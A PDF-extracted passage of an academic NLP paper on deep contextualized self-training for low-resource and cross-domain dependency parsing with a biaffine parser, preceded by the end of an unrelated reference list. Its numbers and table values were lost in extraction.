may be a pragmatic option for personal network analysis. american journal of community psychology ( - ): – . maya-jariego, i., holgado, d. and florido, d. . relations between professional groups in the atlantic and mediterranean fishing enclaves of andalusia (spain): a personal networks approach with clustered graphs. marine policy : – . perry, b. l., pescosolido, b. a. and borgatti, s. p. . egocentric network analysis: foundations, methods, and models (vol. ). cambridge: cambridge university press. snijders, t., spreen, m. and zwaagstra, r. . the use of multilevel modeling for analysing personal networks: networks of cocaine users in an urban area. journal of quantitative anthropology ( ): – . wellman, b. and frank, k. . “network capital in a multi-level world: getting support from personal communities”, in lin, n., coook, k. s. and burt, r. (eds), social capital: theory and research transaction, piscataway, nj, – . deep contextualized self-training for low resource dependency parsing guy rotman and roi reichart faculty of industrial engineering and management, technion, iit grotman@campus.technion.ac.il roiri@ie.technion.ac.il abstract neural dependency parsing has proven very effective, achieving state-of-the-art results on numerous domains and languages. unfortunately, it requires large amounts of labeled data, which is costly and laborious to create. in this paper we propose a self- training algorithm that alleviates this anno- tation bottleneck by training a parser on its own output. our deep contextualized self-training (dcst) algorithm utilizes representation models trained on sequence labeling tasks that are derived from the parser’s output when applied to unlabeled data, and integrates these models with the base parser through a gating mech- anism. we conduct experiments across multiple languages, both in low resource in-domain and in cross-domain setups, and demonstrate that dcst substantially out- performs traditional self-training as well as recent semi-supervised training methods. introduction deep neural networks (dnns) have improved the state-of-the-art in a variety of nlp tasks. these include dependency parsing (dozat and manning, ), semantic parsing (hershcovich et al., ), named entity recognition (yadav and bethard, ), part of speech (pos) tagging (plank and agić, ), and machine translation (vaswani et al., ), among others. unfortunately, dnns rely on in-domain labeled training data, which is costly and laborious to achieve. this annotation bottleneck limits the applicability of nlp technology to a small number of languages and domains. it is hence not a surprise that substantial recent research efforts have been our code is publicly available at https://github. com/rotmanguy/dcst. devoted to dnn training based on both labeled and unlabeled data, which is typically widely available (§ ). a prominent technique for training machine learning models on labeled and unlabeled data is self-training (yarowsky, ; abney, ). in this technique, after the model is trained on a labeled example set it is applied to another set of unlabeled examples, and the automatically and manually labeled sets are then combined in order to re-train the model—a process that is sometimes performed iteratively. although self-training has shown useful for a variety of nlp tasks, its success for deep learning models has been quite limited (§ ). our goal is to develop a self-training algorithm that can substantially enhance dnn models in cases where labeled training data are scarce. particularly, we are focusing (§ ) on the lightly supervised setup where only a small in-domain labeled dataset is available, and on the domain adaptation setup where the labeled dataset may be large but it comes from a different domain than the one to which the model is meant to be applied. our focus task is dependency parsing, which is essential for many nlp tasks (levy and goldberg, ; angeli et al., ; toutanova et al., ; hadiwinoto and ng, ; marcheggiani et al., ), but where self-training has typically failed (§ ). moreover, neural dependency parsers (kiperwasser and goldberg, ; dozat and manning, ) substantially outperform their linear predecessors, which makes the develop- ment of self-training methods that can enhance these parsers in low-resource setups a crucial challenge. we present a novel self-training method, suit- able for neural dependency parsing. our algorithm (§ ) follows recent work that has demonstrated the power of pre-training for improving dnn models in nlp (peters et al., ; devlin et al., ) transactions of the association for computational linguistics, vol. , pp. – , . https://doi.org/ . /tacl a action editor: yue zhang. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/rotmanguy/dcst https://github.com/rotmanguy/dcst https://doi.org/ . /tacl_a_ and particularly for domain adaptation (ziser and reichart, ). however, whereas in previous work a representation model, also known as a contextualized embedding model, is trained on a language modeling related task, our algorithm utilizes a representation model that is trained on sequence prediction tasks derived from the parser’s output. our representation model and the base parser are integrated into a new model through a gating mechanism, and the resulting parser is then trained on the manually labeled data. we experiment (§ , ) with a large variety of lightly supervised and domain adaptation depen- dency parsing setups. for the lightly supervised case we consider setups: in different english domains and in other languages. for the domain adaptation case we consider setups: in differ- ent english domains and in other languages. our deep contextualized self-training (dcst) algorithm demonstrates substantial performance gains over a variety of baselines, including tradi- tional self-training and the recent cross-view train- ing approach (cvt) (clark et al., ) that was designed for semi-supervised learning with dnns. previous work self-training in nlp self-training has shown useful for various nlp tasks, including word sense disambiguation (yarowsky, ; mihalcea, ), bilingual lexicon induction (artetxe et al., ), neural machine translation (imamura and sumita, ), semantic parsing (goldwasser et al., ), and sentiment analysis (he and zhou, ). for constituency parsing, self- training has shown to improve linear parsers both when considerable training data are available (mcclosky et al., a,b), and in the lightly supervised and the cross-domain setups (reichart and rappoport, ). although several authors failed to demonstrate the efficacy of self-training for dependency parsing (e.g., rush et al., ), recently it was found useful for neural dependency parsing in fully supervised multilingual settings (rybak and wróblewska, ). the impact of self-training on dnns is less researched compared with the extensive investi- gation with linear models. recently, ruder and plank ( ) evaluated the impact of self-training and the closely related tri-training method (zhou and li, ; søgaard, ) on dnns for pos tagging and sentiment analysis. they found self-training to be effective for the sentiment classification task, but it failed to improve their bilstm pos tagging architecture. tri-training has shown effective for both the classification and the sequence tagging task, and in vinyals et al. ( ) it has shown useful for neural constituency parsing. this is in-line with steedman et al. ( ), who demonstrated the effectiveness of the closely related co-training method (blum and mitchell, ) for linear constituency parsers. lastly, clark et al. ( ) presented the cvt algorithm, a variant of self-training that uses unsupervised representation learning. cvt differs from classical self-training in the way it exploits the unlabeled data: it trains auxiliary models on restricted views of the input to match the predictions of the full model that observes the whole input. we propose a self-training algorithm based on deep contextualized embeddings, where the embedding model is trained on sequence tagging tasks that are derived from the parser’s output on unlabeled data. in extensive lightly supervised and cross-domain experiments with a neural dependency parser, we show that our dcst algorithm outperforms traditional self-training and cvt. pre-training and deep contextualized embed- ding our dcst algorithm is related to recent work on dnn pre-training. in this line, a dnn is first trained on large amounts of unlabeled data and is then used as the word embedding layer of a more complex model that is trained on labeled data to perform an nlp task. typically, only the upper, task-specific, layers of the final model are trained on the labeled data, while the parameters of the pre-trained embedding network are kept fixed. the most common pre-training task is language modeling or a closely related variant (mccann et al., ; peters et al., ; ziser and reichart, ; devlin et al., ). the outputs of the pre-trained dnn are often referred to as contextualized word embeddings, as these dnns typically generate a vector embedding for each input word, which takes its context into account. pre-training has led to performance gains in many nlp tasks. recently, che et al. ( ) incorporated elmo embeddings (peters et al., ) into a neural dependency parser and reported improvements downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april over a range of universal dependency (ud) (mcdonald et al., ; niver et al., , ) languages in the fully supervised setup. in this paper we focus on the lightly supervised and domain adaptation setups, trying to compensate for the lack of labeled data by exploiting auto- matically labeled trees generated by the base parser for unlabeled sentences. our main experiments (§ ) are with models that utilize non-contextualized word embeddings. we believe this is a more practical setup when considering multiple languages and domains. indeed, che et al. ( ), who trained their elmo model on the unlabeled data of the conll shared task, reported that "the training of elmo on one language takes roughly days on an nvidia p gpu." however, we also demonstrate the power of our models when elmo embeddings are available (§ ), in order to establish the added impact of deep contextual- ized self-training on top of contextualized word embeddings. lightly supervised learning and domain adaptation for dependency parsing finally, we briefly survey earlier attempts to learn parsers in setups where labeled data from the domain to which the parser is meant to be applied is scarce. we exclude from this brief survey literature that has already been mentioned above. some notable attempts are: exploiting short dependencies in the parser’s output when applied to large target domain unlabeled data (chen et al., ), adding inter-sentence consistency constra- ints at test time (rush et al., ), selecting effec- tive training domains (plank and van noord, ), exploiting parsers trained on different do- mains through a mixture of experts (mcclosky et al., ), embedding features in a vector space (chen et al., ), and bayesian averaging of a range of parser parameters (shareghi et al., ). recently, sato et al. ( ) presented an adversarial model for cross-domain dependency parsing in which the encoders of the source and the target domains are integrated through a gating mechanism. their approach requires target do- main labeled data for parser training and hence it cannot be applied in the unsupervised domain adaptation setup we explore (§ ). we adopt their gating mechanism to our model and extend it to integrate more than two encoders into a final model. figure : the biaffine parser. background: the biaffine parser the parser we utilize in our experiments is the biaffine parser (dozat and manning, ). because the structure of the parser affects our dcst algorithm, we briefly describe it here. a sketch of the parser architecture is provided in figure . the input to the parser is a sentence (x , x , . . . , xm) of length m. an embedding layer embeds the words into fixed-size vectors (w , w , . . . , wm). additionally, character-level embeddings ckt retrieved from a cnn (zhang et al., ), and a pos embedding pt, are concatenated to each word vector. at time t, the final input vector ft = [wt; ct; pt] is then fed into a bilstm encoder eparser that outputs a hidden representation ht: ht = eparser(ft). ( ) given the hidden representations of the i’th word hi and the j’th word hj , the decoder outputs a score si,j, indicating the model belief that the latter should be the head of the former in the dependency tree. more formally, si,j = r t i urj + w t j rj, ( ) where ri = mlp(hi), and u and wj are learned parameters (mlp is a multi-layered perceptron). similarly, a score li,j,k is calculated for the k’th possible dependency label of the arc (i, j): li,j,k = q t i u ′ kqj + w ′t k [qi; qj] + b ′ k, ( ) where qi = mlp ′ (hi), and u ′ k, w ′ k, and b ′ k are learned parameters. during training the model aims to maximize the probability of the gold tree: m∑ i= p(yi|xi, θ) + p(y′i|xi, yi, θ), ( ) downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april algorithm deep contextualized self-training (dcst) input: labeled data l, unlabeled data u algorithm: . train the base parser on l (§ ). . parse the sentences of u with the base parser. . transform the automatically parsed trees of u to one or more word-level tagging schemes (§ . ). . train (a) contextualized embedding model(s) to predict the word-level tagging(s) of u (§ . ). . integrate the representation model(s) of step with the base parser, and train the resulting parser on l (§ . ). where yi is the head of xi, y′i is the label of the arc (xi, yi), θ represents the model’s parameters, p(yi|xi, θ) ∝ exp(sxi,yi), and p(y′i|xi, yi, θ) ∝ exp(lxi,yi,y′i). at test time, the parser runs the mst algorithm (edmonds, ) on the arc scores in order to generate a valid tree. deep contextualized self-training in this section we present our dcst algorithm for dependency parsing (algorithm ). as a semi- supervised learning algorithm, dcst assumes a labeled dataset l = {(xli, yli)} |l| i= , consisting of sentences and their gold dependency trees, and an unlabeled dataset u = {xui } |u| i= , consisting of sentences only. we start (algorithm , step ) by training the base parser (the biaffine parser in our case) on the labeled dataset l. once trained, the base parser can output a dependency tree for each of the unlabeled sentences in u (step ). we then transform the automatic dependency trees generated for u into one or more word-level tagging schemes (step ). in § . we elaborate on this step. then, we train a bilstm sequence tagger to predict the word- level tags of u (step ). if the automatic parse trees are transformed to more than one tagging scheme, we train multiple biltms—one for each scheme. finally, we construct a new parser by integrating the base parser with the representation bilstm(s), and train the final parser on the labeled dataset l (step ). at this stage, the base parser parameters are randomly initialized, while the parameters of the representation bilstm(s) are initialized to those learned in step . we next discuss the three word-level tagging schemes derived from the dependency trees (step ), and then the gating mechanism utilized in order to compose the hybrid parser (step ). . representation learning (steps and ) in what follows we present the three word-level tagging schemes we consider at step of the dcst algorithm. transferring the parse trees into tagging schemes is the key for populating information from the original (base) parser on unlabeled data, in a way that can later be re-encoded to the parser through its word embedding layers. the key challenge we face when implementing this idea is the transformation of dependency trees into word level tags that preserve important aspects of the information encoded in the trees. we consider tagging schemes that maintain various aspects of the structural information encoded in the tree. particularly, we start from two tagging schemes that even if fully predicted still leave ambiguity about the actual parse tree: the number of direct dependants each word has and the distance of each word from the root of the tree. we then consider a tagging scheme, referred to as the relative pos-based scheme, from which the dependency tree can be fully reconstructed. while other tagging schemes can definitely be proposed, we believe that the ones we consider here span a range of possibilities that allows us to explore the validity of our dcst framework. more specifically, the tagging schemes we consider are defined as follows: number of children each word is tagged with the number of its children in the dependency tree. we consider only direct children, rather than other descendants, which is equivalent to counting the number of outgoing edges of the word in the tree. distance from the root each word is tagged with its minimal distance from the root of the tree. for example, if the arc (root , j) is included in the tree, the distance of the j’th word from the root is . likewise, if (root , j) is not included but (root, i) and (i, j) are, then j’th distance is . relative pos-based encoding each word is tagged with its head word according to the relative pos-based scheme (spoustová and spousta, ; strzyz et al., ) the head of a word is encoded by a pair (p, e) ∈ p × [−m + , m − ], where p is the set of all possible parts of speech and m is the sentence length. for a positive (negative) number e and a pos p, the pair indicates that the head of the represented word is the e’th word to its right (left) with the pos tag p. to avoid sparsity downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : the sequence tagger applied to automatically parsed sentences in u (algorithm , step ). the tagger predicts for each word its label according to one of the three tagging schemes: number of children (blue), distance from the root (red), and relative pos-based encoding (black). the curved arrows sketch the gold dependency tree from which the word-level tags are derived. we coarsen the pos tags related to nouns, proper names, verbs, adjectives, punctuation marks, and brackets into one tag per category. although this word-level tagging scheme was introduced as means of formulating dependency parsing as a sequence tagging task, in practice sequence models trained on this scheme are not competitive with state-of-the-art parsers and often generate invalid tree structures (strzyz et al., ). here we investigate the power of this scheme as part of a self-training algorithm. the sequence tagger our goal is to encode the information in the automatically parsed trees into a model that can be integrated with the parser at later stages. this is why we choose to transform the parse trees into word-level tagging schemes that can be learned accurately and efficiently by a sequence tagger. note that efficiency plays a key role in the lightly supervised and domain adaptation setups we consider, as large amounts of unlabeled data should compensate for the lack of labeled training data from the target domain. we hence choose a simple sequence tagging architecture, depicted in figure . the encoder etgr is a bilstm, similarly to eparser of the parser. the decoder is composed of two fully connected layers with dropout (srivastava et al., ) and an exponential linear unit activation figure : an illustration of the hybrid parser with three auxiliary sequence taggers. an input word vector is passed through the parser encoder (e( )parser) and the three pre-trained tagger encoders (e( )tgr − e( )tgr). the gating mechanism (gate) computes a weighted average of the hidden vectors. finally, the output of the gating mechanism is passed to the biaffine decoder to predict the arc and label scores for each word pair. function (clevert et al., ), followed by a final softmax layer that outputs the tag probabilities. . the final hybrid parser (step ) in step , the final step of algorithm , we integrate the bilstm of the sequence tagger, which encodes the information in the automatically generated dependency trees, with the base parser. importantly, when doing so we initialize the bilstm weights to those to which it converged at step . the parameters of the base (biaffine) parser, in contrast, are randomly initialized. the resulting hybrid parser is then trained on the labeled data in l. this way, the final model integrates the information from both l and the automatic tagging of u, generated in step and . we next describe how the encoders of the sequence tagger and the biaffine parser, etgr and eparser, are integrated through a gating mechanism, similar to that of sato et al. ( ). the gating mechanism given an input word vector ft (§ ), the gating mechanism learns to scale between the bilstm encoder of the parser to that of the sequence tagger (figure ): at = σ(wg[eparser(ft); etgr(ft)] + bg), gt = at � eparser(ft) + ( − at) � etgr(ft). where � is the element-wise product, σ is the sigmoid function, and wg and bg are the gating downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april mechanism parameters. the combined vector gt is then fed to the parser’s decoder. extension to n ≥ sequence taggers we can naturally extend our hybrid parser to support n auxiliary taggers (see again figure ). given n taggers trained on n different tagging schemes, the gating mechanism is modified to be: s (i) t = w (i) g [e ( ) parser(ft); e ( ) tgr(ft); . . . ; e (n+ ) tgr (ft)] + b(i)g , a (i) t = exp(s (i) t )∑n+ j= exp(s (j) t ) , gt = a ( ) t � e( )parser(ft) + n+ ∑ i= a (i) t � e(i)tgr(ft). this extension provides a richer representation of the automatic tree structures, as every tagging scheme captures a different aspect of the trees. indeed, in most of our experiments, when integrating the base parser with our three proposed schemes, the resulting model was superior to models that consider a single tagging scheme. evaluation setups this paper focuses on exploiting unlabeled data in order to improve the accuracy of a supervised parser. we expect this approach to be most useful when the parser does not have sufficient labeled data for training, or when the labeled training data do not come from the same distribution as the test data. we hence focus on two setups: the lightly supervised in-domain setup in this setup we are given a small labeled dataset l = {(xli, yli)} |l| i= of sentences and their gold dependency trees and a large unlabeled dataset u = {(xui )} |u| i= of sentences coming from the same domain, where |l| � |u|. our goal is to parse sentences from the domain of l and u. the unsupervised domain adaptation setup in this setup we are given a labeled source domain dataset l = {(xli, yli)} |l| i= of sentences and their gold dependency trees, and an unlabeled dataset u = {(xui )} |u| i= of sentences from a different target domain. unlike the lightly-supervised setup, here l may be large enough to train a high-quality parser as long as the training and test sets come from the same domain. however, our goal here is to parse sentences from the target domain. experiments we experiment with the task of dependency parsing, in two setups: (a) lightly supervised in- domain and (b) unsupervised domain adaptation. data we consider two datasets: (a) the english ontonotes . (hovy et al., ) corpus. this corpus consists of text from domains: broadcast conversation (bc: training, development, and test sentences), broadcast news (bn: , , ), magazine (mz: , , ), news (nw: , , ), bible (pt: , , ), telephone conversation (tc: , , ), and web (wb: , , ). the corpus is annotated with constituency parse trees and pos tags, as well as other labels that we do not use in our experiments. the constituency trees were converted to dependency trees using the elitcloud conversion tool. in the lightly supervised setup we experiment with each domain separately. we further utilize this corpus in our domain adaptation experiments. (b) the ud dataset (mcdonald et al., ; nivre et al., , ). this corpus contains more than corpora of over languages, annotated with dep- endency trees and universal pos tags. for the lightly supervised setup we chose low-resource languages that have no more than k training sentences: old church slavonic (cu), danish (da), persian (fa), indonesian (id), latvian (lv), slovenian (sl), swedish (sv), turkish (tr), urdu (ur), and vietnamese (vi), and performed mono- lingual experiments with each. for the domain adaptation setup we experiment with languages, considering two corpora from different domains for each: czech (cs fictree: fiction, cs pdt: news and science), galician (gl ctg: science and legal, gl treegal: news), italian (it isdt: legal, news and wiki, it postwita: social media), romanian (ro nonstandard: poetry and bible, ro rrt: news, literature, science, legal and wiki), and swedish (sv lines: literature and politics, sv talbanken: news and textbooks). training setups for the lightly supervised setup we performed experiments with the ontonotes we removed wb test set sentences where all words are pos tagged with ‘‘xx’’. https://github.com/elitcloud/elit-java. in case a language has multiple corpora, our training, development and test sets are concatenations of the corresponding sets in these corpora. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/elitcloud/elit-java domains and the ud corpora, for a total of in-domain setups. for each setup we consider three settings that differ from each other in the size of the randomly selected labeled training and development sets: , , or . we use the original test sets for evaluation, and the remaining training and development sentences as unlabeled data. for the english unsupervised domain adaptation setup, we consider the news (nw) section of onto- notes . as the source domain, and the remaining sections as the target domains. the nw training and development sets are used for the training and development of the parser, and the unlabeled versions of the target domain training and develop- ment sets are used for training and development of the representation model. the final model is evaluated on the target domain test set. similarly, for unsupervised domain adaptation with the ud languages, we consider within each language one corpus as the source domain and the other as the target domain, and apply the same train/development/test splits as above. for each language we run two experiments, differing in which of the two corpora is considered the source and which is considered the target. for all domain adaptation experiments, when training the final hybrid parser (figure ) we sometimes found it useful to keep the parameters of the bilstm tagger(s) fixed in order to avoid an overfitting of the final parser to the source domain. we treat the decision of whether or not to keep the parameters of the tagger(s) fixed as a hyper-parameter of the dcst models and tune it on the development data. we measure parsing accuracy with the standard unlabeled and labeled attachment scores (uas and las), and measure statistical significance with the t-test (following dror et al., ). models and baselines we consider four variants of our dcst algorithm, differing on the word tagging scheme on which the bilstm of step is trained (§ . ): dcst-nc: with the number of children scheme, dcst-dr: with the distance from the root scheme, dcst-rpe: with the relative pos-based encoding scheme, and dcst-ens where the parser is integrated with three bilstms, one for each scheme (where ens stands for ensemble) (§ . ). in languages where the development set was smaller than sentences we used the entire development set. to put the results of our dcst algorithm in context, we compare its performance to the following baselines. base: the biaffine parser (§ ), trained on the labeled training data. base-fs: the biaffine parser (§ ), trained on all the labeled data available in the full training set of the corpus. in the domain adaptation setups base-fs is trained on the entire training set of the target domain. this baseline can be thought of as an upper bound on the results of a lightly-supervised learning or domain-adaptation method. base + random gating (rg): a randomly initialized bilstm is integrated to the biaffine parser through the gating mechanism, and the resulting model is trained on the labeled training data. we compare to this baseline in order to quantify the effect of the added parameters of the bilstm and the gating mechanism, when this mechanism does not inject any information from unlabeled data. self- training: the traditional self-training procedure. we first train the base parser on the labeled training data, then use the trained parser to parse the unlabeled data, and finally re-train the base parser on both the manual and automatic trees. we would also like to test the value of training a representation model to predict the dependency labeling schemes of § . , in comparison to the now standard pre-training with a language modeling objective. hence, we experiment with a variant of dcst where the bilstm of step is trained as a language model (dcst-lm). finally, we compare to the cross-view training algorithm (cvt) (clark et al., ), which was developed for semi-supervised learning with dnns. hyper-parameters we use the biaffine parser implementation of ma et al. ( ). we consider the following hyper-parameters for the parser and the sequence tagger: epochs with an early stopping criterion according to the development set, the adam optimizer (kingma and ba, ), a batch size of , a learning rate of . , and dropout probabilities of . . the -layer stacked bilstms of the parser and the sequence tagger generate hidden representations of size . the fully connected layers of the tagger are of size (first layer) https://github.com/tensorflow/models/ tree/master/research/cvt text. https://github.com/xuezhemax/neuronlp . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/tensorflow/models/tree/master/research/cvt_text https://github.com/tensorflow/models/tree/master/research/cvt_text https://github.com/xuezhemax/neuronlp bc bn mz nw pt tc wb model uas las uas las uas las uas las uas las uas las uas las base . . . . . . . . . . . . . . base+rg . . . . . . . . . . . . . . dcst-lm . . . . . . . . . . . . . . self-training . . . . . . . . . . . . . . cvt . . . . . . . . . . . . . . dcst-nc . . . . . . . . . . . . . . dcst-dr . . . . . . . . . . . . . . dcst-rpe . . . . . . . . . . . . . . dcst-ens . . . . . . . . . . . . . . base-fs . . . . . . . . . . . . . . table : lightly supervised ontonotes results with training sentences. base-fs is an upper bound. cu da fa id lv sl sv tr ur vi model uas las uas las uas las uas las uas las uas las uas las uas las uas las uas las base . . . . . . . . . . . . . . . . . . . . base+rg . . . . . . . . . . . . . . . . . . . . dcst-lm . . . . . . . . . . . . . . . . . . . . self-training . . . . . . . . . . . . . . . . . . . . cvt . . . . . . . . . . . . . . . . . . . . dcst-nc . . . . . . . . . . . . . . . . . . . . dcst-dr . . . . . . . . . . . . . . . . . . . . dcst-rpe . . . . . . . . . . . . . . . . . . . . dcst-ens . . . . . . . . . . . . . . . . . . . . base-fs . . . . . . . . . . . . . . . . . . . . table : lightly supervised ud results with training sentences. base-fs is an upper bound. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april and (second layer). all other parser hyper- parameters are identical to those of the original implementation. we utilize -dimensional pre-trained word embeddings: glove (pennington et al., ) for english and fasttext (grave et al., ) for the ud languages. character and pos embeddings are -dimensional and are initialized to random normal vectors. cvt is run for k gradient update steps. results table presents the lightly supervised ontonotes results when training with labeled sentences, and table presents the ud results in the same setup. tables and report domain adaptation results for the ontonotes and ud target do- mains, respectively. underscored results are sig- nificant compared to the highest scoring baseline, based on t-test with p < . . dcst with syntactic self-training dcst- ens, our model that integrates all three syntactically self-trained bilstms, is clearly the best model. in the lightly supervised setup, it performs best on of ontonotes domains and on of ud corpora (with the uas measure). in the cases where dcst-ens is not the best performing model, it is the second or third best model. in the english and multilingual domain adaptation setups, dcst-ens is clearly the best performing model, where in only multilingual target domains it is second. moreover, dcst-nc, dcst-dr, and dcst- rpe, which consider only one syntactic scheme, also excel in the lightly supervised setup. they outperform all the baselines (models presented above the top separating lines in the tables) in the ud experiments, and dcst-rpe and dcst-dr outperform all the baselines in of ontonotes domains (with the las measure). in the domain adaptation setup, however, they are on par with the strongest baselines, which indicates the importance of exploiting the information in all three schemes in this setup (results are not shown in tables and in order to save space). http://nlp.stanford.edu/data/glove. b. d.zip. https://fasttext.cc/docs/en/crawl- vectors.html. for this comparison, base-fs is not considered a baseline, but an upper bound. note, that with few exceptions, dcst-nc is the least effective method among the syntactically self-trained dcst alternatives. this indicates that encoding the number of children each word has in the dependency tree is not a sufficiently informative view of the tree. comparison to baselines the cvt algorithm performs quite well in the english ontonotes lightly supervised setup—it is the best performing model on two domains (nw and pt) and the best baseline for three other domains when considering the uas measure (bc, bn, and tc). however, its performance substantially degrades in domain adaptation. particularly, in out of ontonotes setups and in out of ud setups it is the worst performing model. moreover, cvt is the worst performing model in the lightly supervised multilingual setup. overall, this recently proposed model that demonstrated strong results across several nlp tasks, does not rival our dcst models with syntactic self-training in our experimental tasks. notice that clark et al. ( ) did not experiment in domain adaptation setups and did not consider languages other than english. our results suggest that in these cases dcst with syntactic self- training is a better alternative. we next evaluate the impact of the different components of our model. first, comparison with dcst-lm—the version of our model where the syntactically self-trained bilstm is replaced with a bilstm trained on the same unlabeled data but with a language modeling objective, allows us to evaluate the importance of the self-generated syntactic signal. the results are conclusive: in all our four setups—english and multilingual lightly supervised, and english and multilingual domain adaptation—dcst-lm is outperformed by dcst-ens that considers all three self-trained bilstms. dcst-lm is also consistently outperformed by dcst-rpe, dcst- dr and dcst-nc that consider only one syntactic annotation scheme, except from a few english lightly supervised cases where it outperforms dcst-nc by a very small margin. syntactic self-supervision hence provides better means of exploiting the unlabeled data, compared with the standard language modeling alternative. another question is whether the bilstm mod- els should be trained at all. indeed, in recent papers untrained lstms with random weights downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april http://nlp.stanford.edu/data/glove. b. d.zip http://nlp.stanford.edu/data/glove. b. d.zip https://fasttext.cc/docs/en/crawl-vectors.html https://fasttext.cc/docs/en/crawl-vectors.html bc bn mz pt tc wb model las las las las las las base . . . . . . base+rg . . . . . . dcst-lm . . . . . . self-training . . . . . . cvt . . . . . . dcst-ens . . . . . . base-fs . . . . . . table : unsupervised domain adaptation ontonotes results. base-fs is an upper bound. cs fictree cs pdt gl ctg gl treegal it isdt it postwita ro nonstandard ro rrt sv lines sv talbanken model las las las las las las las las las las base . . . . . . . . . . base+rg . . . . . . . . . . dcst-lm . . . . . . . . . . self-training . . . . . . . . . . cvt . . . . . . . . . . dcst-ens . . . . . . . . . . base-fs . . . . . . . . . . table : unsupervised domain adaptation ud results. base-fs is an upper bound. substantially enhanced model performance (zhang and bowman, ; tenney et al., ; wang et al., ; wieting and kiela, ). our results lead to two conclusions. firstly, base+rg, the model that is identical to the syntactically trained dcst except that the biaffine parser is integrated with a randomly initialized bilstm through our gating mechanism, is consistently outperformed by all our syntactically self-trained dcst models, with very few exceptions. secondly, in line with the conclusions of the aforementioned papers, base+rg is one of the strongest baselines in our experiments. perhaps most importantly, in most experiments this model outperforms the base parser—indicating the positive impact of the randomly initialized representation models. moreover, it is the strongest baseline in english domain adaptation setups and in of languages in the lightly supervised multilingual experiments (considering the uas measure), and is the second-best baseline in out of english lightly supervised setups (again considering the uas measure). the growing evidence for the positive impact of such randomly initialized models should motivate further investigation of the mechanism that underlies their success. finally, our results demonstrate the limited power of traditional self-training: in english domain adaptation it harms or does not improve the base parser; in multilingual domain adaptation it is the best model in cases; and it is the best baseline in of the english lightly supervised setups and in of the multilingual lightly supervised setups. this supports our motivation to propose an improved self-training framework. ablation analysis and discussion impact of training set size figure presents the impact of the dcst-ens method on the biaffine parser, in the lightly supervised english setups, as a function of the labeled training set size of the parser. clearly, the positive impact is substantially stronger for smaller training sets. particularly, when the parser is trained with sentences (the green bar) the improvement is higher than uas points in of cases, among which in (nw and wb) it is higher than uas points. for training sentences the performance gap drops to – uas points, and for training sentences it is – points. this pattern is in line with previous literature on the impact of training methods designed for the lightly supervised setup, and particularly for self- training when applied to constituency parsing (reichart and rappoport, ). we note that many studies failed to improve dependency parsing with traditional self-training even for very downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : uas gap between dcst-ens and the base parser, as a function of the training set size ( / / ), across ontonotes domains. small training set sizes (rush et al., ). we also note that syntactically self-trained dcst consistently improves the biaffine parser in our domain adaptation experiments, although the entire training set of the news (nw) section of ontonotes is used for training. impact of self-training quality we next aim to test the connection between the accuracy of the self-trained sequence taggers and the quality of the biaffine parser when integrated with the bilstm encoders of these taggers. ideally, we would expect that the higher the quality of the bilstm, the more positive its impact on the parser. this would indicate that the improvement we see with the dcst models indeed results from the information encoded in the self-trained taggers. to test this hypothesis, figure plots, for each of the bilstm taggers considered in this paper, the sentence-level accuracy scores of the tagger when applied to the ontonotes test sets vs. the las scores of the biaffine parser that was integrated with the corresponding bilstm, when that parser was applied to the same test sentences. in such a plot, if the regression line that fits the points has an r-squared (r ) value of , this indicates a positive linear relation between the self-trained tagger and the parser quality. the resulting r values are well aligned with the relative quality of the dcst models. particularly, dcst-lm, the least efficient method where the tagger is trained as a language model rather than on a syntactic signal, has an r of . . dcst-dr and dcst-nc, which are the next in terms of parsing quality (table ), have r values figure : auxiliary task accuracy scores of each bilstm tagger vs. the las score of the biaffine parser when integrated with that bilstm. the bilstm scores are computed on the test sets and reflect the capability of the bilstm that was trained on unlabeled data with syntactic signal extracted from the base parser’s trees (or as a language model for dcst-lm) to properly tag the test sentences. the points correspond to sentence scores across all ontonotes . test sets, and the heat map presents the frequency of each point. of . and . , respectively, although dcst-dr performs slightly better. finally, dcst-rpe, the best performing model among the four in all cases but two, has an r value of . . these results provide a positive indication of the hypothesis that the improved parsing quality is caused by the representation model and is not a mere artifact. tagging scheme quality analysis we next aim to shed more light on the quality of the tagging schemes with which we train our bilstm taggers. we perform an error analysis on the parse trees produced by the final hybrid parser (figure ), when each of the schemes is used in the bilstm tagger training step during the lightly supervised setups. the metrics we compute correspond to the three tagging schemes, and our goal is to examine whether each of the self-trained representation models (bilstms) improves the capability of the final parser to capture the information encoded in its tagging scheme. particularly, we consider four metrics: absolute difference of number of children (ad-nc): the absolute difference between the number of children a word has in the gold tree and the corresponding number in the predicted tree; absolute difference of distance from the root (ad-dr): the absolute difference between the downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april model ad-nc ad-dr ad-pdh pos head error ontonotes base . . . . dcst-nc . . . . dcst-dr . . . . dcst-rpe . . . . dcst-ens . . . . ud base . . . . dcst-nc . . . . dcst-dr . . . . dcst-rpe . . . . dcst-ens . . . . table : tagging scheme error analysis. model uas las base . . dcst-lm . . self-training . . cvt . . dcst-ens . . table : sentence length adaptation results. distance of a word from the root in the gold tree and the corresponding distance in the predicted tree; absolute difference of positional distance from the head (ad-pdh): the absolute difference between the positional distance of a word from its head word according to the gold tree and the corresponding number according to the predicted tree (kiperwasser and ballesteros, ) (we count the words that separate the head from the modifier in the sentence, considering the distance negative if the word is to the right of its head); and pos head error: an indicator function which returns if the pos tag of the head word of a given word according to the gold tree is identical to the corresponding pos tag in the predicted tree, and otherwise. for all the metrics we report the mean value across all words in our test sets. the values of ad-nc, ad-dr, and ad-pdh are hence in the [ , m] range, where m is the length of the longest sentence in the corpus. the values of the pos head error are in the [ , ] range. for all metrics lower values indicate that the relevant information has been better captured by the 